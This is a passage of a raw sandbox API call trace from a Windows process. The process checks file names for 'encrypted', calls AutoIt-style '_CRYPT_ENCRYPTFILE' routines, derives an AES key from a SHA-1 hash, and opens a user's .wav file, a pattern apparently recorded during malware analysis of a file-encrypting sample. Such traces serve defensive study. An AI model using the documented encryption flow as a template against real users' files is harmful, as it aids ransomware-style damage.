dwCmpFlags=0x1, lpString1="k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="76LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.557] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.557] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.557] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.557] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.558] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.558] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.558] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.558] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0xdd7f2430, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0x7c2100 [0031.558] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.558] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.558] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.558] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.558] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.558] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.559] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.559] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.559] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.559] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.559] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.560] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.560] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.560] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.560] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.561] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.561] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.561] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.561] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.561] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.561] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.561] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.562] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.562] CryptHashData (hHash=0x7c2240, pbData=0x7c77b8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.562] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.562] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.562] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.562] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.562] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.562] CryptDestroyHash (hHash=0x7c2240) returned 1 [0031.563] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn\\uzxbvza9thehqnqn.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.563] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.563] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.563] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 